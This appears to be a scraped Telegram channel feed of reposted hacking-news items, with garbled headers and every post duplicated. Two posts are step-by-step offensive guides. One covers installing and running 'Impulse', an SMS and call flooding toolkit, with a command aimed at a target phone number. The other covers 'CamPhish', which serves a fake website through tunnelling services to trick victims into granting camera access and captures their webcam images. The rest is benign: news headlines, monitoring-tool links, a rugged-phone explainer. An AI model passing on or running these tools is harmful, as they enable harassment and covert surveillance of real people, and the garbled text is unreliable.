Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated Impulse Denial-of-service ToolKit :
free SMS & Call flood:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) LINUX
1) sudo apt update
2) sudo apt install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
B) Termux:
1) pkg update
2) pkg install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
TO USE :
python3 impulse.py --method SMS --time 20 --threads 15 --target +(phone)
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Updated Impulse Denial-of-service ToolKit :
free SMS & Call flood:
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
A) LINUX
1) sudo apt update
2) sudo apt install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
B) Termux:
1) pkg update
2) pkg install python3 python3-pip git -y
3) git clone https://github.com/LimerBoy/Impulse
4) cd Impulse/
5) pip3 install -r requirements.txt
6) python3 impulse.py --help
TO USE :
python3 impulse.py --method SMS --time 20 --threads 15 --target +(phone)
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
Campari, the hacker attack and the 15 million dollar ransom: "The data of 4,700 employees stolen"
#Leaks #Malwares
#Leaks #Malwares
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
Kali Linux
Termux
MacOS
Ubuntu
Perrot Sec OS
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal
1) apt-get -y install php openssh git wget
Installing (Kali Linux/Termux):
2) git clone https://github.com/techustad/hack
3) cd hack
4) bash camphish.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦CamPhish is techniques to take cam shots of target's phone fornt camera or PC webcam. CamPhish Hosts a fake website on in built PHP server and uses ngrok & serveo to generate a link which we will forward to the target, which can be used on over internet. website asks for camera permission and if the target allows it, this tool grab camshots of target's device
Kali Linux
Termux
MacOS
Ubuntu
Perrot Sec OS
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
This tool require PHP for webserver, SSH or serveo link. First run following command on your terminal
1) apt-get -y install php openssh git wget
Installing (Kali Linux/Termux):
2) git clone https://github.com/techustad/hack
3) cd hack
4) bash camphish.sh
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - techustad/hack
Contribute to techustad/hack development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended linux monitoring softwares :
https://www.solarwinds.com/netflow-traffic-analyzer?CMP=ORG-BLG-DNS-X_WW_X_NP_X_X_EN_X_X-NTA-20191008_2020BestLinuxNe_X_X_VidNo_X-X
https://www.paessler.com/linux_network_monitoring
https://www.nagios.com/products/nagios-network-analyzer/
https://www.zenoss.com/product/zenoss-cloud-it-operations-management
https://icinga.com/products/
https://opennms.org/en/opennms
https://www.cacti.net/
https://www.zabbix.com/features
http://pandorafms.org/
https://www.librenms.org/
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Recommended linux monitoring softwares :
https://www.solarwinds.com/netflow-traffic-analyzer?CMP=ORG-BLG-DNS-X_WW_X_NP_X_X_EN_X_X-NTA-20191008_2020BestLinuxNe_X_X_VidNo_X-X
https://www.paessler.com/linux_network_monitoring
https://www.nagios.com/products/nagios-network-analyzer/
https://www.zenoss.com/product/zenoss-cloud-it-operations-management
https://icinga.com/products/
https://opennms.org/en/opennms
https://www.cacti.net/
https://www.zabbix.com/features
http://pandorafms.org/
https://www.librenms.org/
β β β Uππ»βΊπ«Δπ¬πβ β β β
Solarwinds
NetFlow Analyzer - Analyze Remote Network Bandwidth Traffic | SolarWinds
Identify how bandwidth is being used with NetFlow Traffic Analyzer for SolarWinds Network Performance Monitor. Download free 30-day analyzer software trial!
Forwarded from UNDERCODE NEWS
Google reveals vulnerability to iPhones! Without touch, details can be stolen, and Apple has fixed.
#Vulnerabilities
#Vulnerabilities
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what to choose between a mobile phone and a rugged smartphone?
These types of phones can withstand the harshest and most remote conditions and can be used in extreme weather conditions (such as mountain ranges or deserts), high humidity, rain and even submersion in water.
Given the wide range of models on the market, how do you choose the best option?
Each rugged phone has been assigned an Ingress Protection (IP) rating.
The Ingress Protection rating indicates how resistant a particular phone is to water and dust.
It consists of two numbers (for example, IP68):
1) The first number indicates the degree of resistance of the phone to solids, usually dust or sand. This number can be between 0 and 6: 0 means the phone is not dustproof, and 6 means it is completely dustproof, even if it is fine dust.
2) The second number indicates the phone's resistance to liquids. This number can range from 0 to 8. The higher the number, the higher the moisture resistance level. For example, 3 means the smartphone is protected from rain, 5 means it is protected from low-pressure water jets from any direction, and 8 means that the phone can withstand prolonged immersion in water more than one meter deep for one hour (water depth which the phone can withstand when immersed is specified by each manufacturer). Recently, the 9K has entered the market, which refers to itself as a high pressure protection level.
If you are looking for a phone that can withstand dust and immersion in water (for example, if you work near a plumbing), an IP68 phone is perfect for you.
Β» It is also the most common smartphone model.
Β» In terms of bumps and drops, shockproof phones are also rated by military standards.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦what to choose between a mobile phone and a rugged smartphone?
These types of phones can withstand the harshest and most remote conditions and can be used in extreme weather conditions (such as mountain ranges or deserts), high humidity, rain and even submersion in water.
Given the wide range of models on the market, how do you choose the best option?
Each rugged phone has been assigned an Ingress Protection (IP) rating.
The Ingress Protection rating indicates how resistant a particular phone is to water and dust.
It consists of two numbers (for example, IP68):
1) The first number indicates the degree of resistance of the phone to solids, usually dust or sand. This number can be between 0 and 6: 0 means the phone is not dustproof, and 6 means it is completely dustproof, even if it is fine dust.
2) The second number indicates the phone's resistance to liquids. This number can range from 0 to 8. The higher the number, the higher the moisture resistance level. For example, 3 means the smartphone is protected from rain, 5 means it is protected from low-pressure water jets from any direction, and 8 means that the phone can withstand prolonged immersion in water more than one meter deep for one hour (water depth which the phone can withstand when immersed is specified by each manufacturer). Recently, the 9K has entered the market, which refers to itself as a high pressure protection level.
If you are looking for a phone that can withstand dust and immersion in water (for example, if you work near a plumbing), an IP68 phone is perfect for you.
Β» It is also the most common smartphone model.
Β» In terms of bumps and drops, shockproof phones are also rated by military standards.
β β β Uππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE NEWS
β β β Uππ»βΊπ«Δπ¬πβ β β β
RECOMMENDED WEB HACKING COURSES:
https://www.youtube.com/watch?v=2_lswM1S264
2H
https://www.youtube.com/watch?v=24fHLWXGS-M
5H
https://www.youtube.com/watch?v=dz7Ntp7KQGA
10H
https://www.youtube.com/watch?v=biM47F99i9A
β β β Uππ»βΊπ«Δπ¬πβ β β β
RECOMMENDED WEB HACKING COURSES:
https://www.youtube.com/watch?v=2_lswM1S264
2H
https://www.youtube.com/watch?v=24fHLWXGS-M
5H
https://www.youtube.com/watch?v=dz7Ntp7KQGA
10H
https://www.youtube.com/watch?v=biM47F99i9A
β β β Uππ»βΊπ«Δπ¬πβ β β β
YouTube
Ethical Hacking 101: Web App Penetration Testing - a full course for beginners
Learn web application penetration testing from beginner to advanced. This course is perfect for people who are interested in cybersecurity or ethical hacking.
βοΈResourcesβοΈ
πBurp Suite: https://portswigger.net/burp
πWAFW00F: https://github.com/EnableSecurity/wafw00fβ¦
βοΈResourcesβοΈ
πBurp Suite: https://portswigger.net/burp
πWAFW00F: https://github.com/EnableSecurity/wafw00fβ¦
Forwarded from UNDERCODE NEWS